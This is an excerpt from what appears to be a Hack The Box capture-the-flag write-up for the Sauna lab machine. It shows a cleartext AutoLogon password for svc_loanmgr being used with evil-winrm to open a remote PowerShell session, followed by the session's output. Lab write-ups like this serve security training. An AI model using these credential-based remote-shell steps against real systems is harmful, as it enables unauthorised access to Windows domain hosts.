svc_loanmgr
The target system has the AutoLogon configured for the svc_loadmgr user along with a CLEARTEXT password
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ evil-winrm -i sauna.egotistical-bank.local -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> hostname
SAUNA
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::17a
ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
ipv4 address. . . . . . . . . . . : 10.10.10.175
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
10.10.10.2Lateral Movement made to the svc_loanmgr user